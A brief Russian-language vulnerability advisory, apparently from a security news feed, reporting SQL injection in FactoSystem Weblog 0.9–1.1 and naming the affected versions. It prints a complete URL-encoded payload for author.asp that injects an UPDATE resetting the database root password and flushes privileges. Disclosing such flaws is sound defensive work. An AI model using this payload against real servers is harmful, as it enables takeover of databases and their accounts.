SQL Injection в FactoSystem

FactoSystem Weblog - бесплатный пакет программ для обработки журналов регистрации Web серверов.

FactoSystem не фильтрует специальные символы. Атакующий может представить запрос, содержащий специальные символы, и выполнять произвольные команды с привилегиями пользователя базы данных.

Пример (убирайте пробелы):

http://www.example.com/author.asp ?authornumber=1%28%20And%20
AuthorTable%2EAuthorID %3DBlurbTable%2EAuthorID%20And%20 BlurbTable%2ESub_id
%3DSubjectTable%2ESub_id%20Order%20By
%20BlurbTable%2EBlurbdate%20desc%2C%20blurbtable%2Eblurbtime
%20desc%3BUPDATE%20user%20SET%20Password% 3DPASSWORD%28%27password%27%29%20WHERE
%20user%3D%27root%27%3B%20FLUSH %20PRIVILEGES%3B--

Уязвимость обнаружена в FactoSystem FactoSystem Weblog 0.9-1.1.

Анатолий Ализар: Бывший автор новостной ленты «Хакера». Увлекается современными технологиями, оружием, информационной безопасностью, носимой электроникой и в целом концепцией Internet of Things.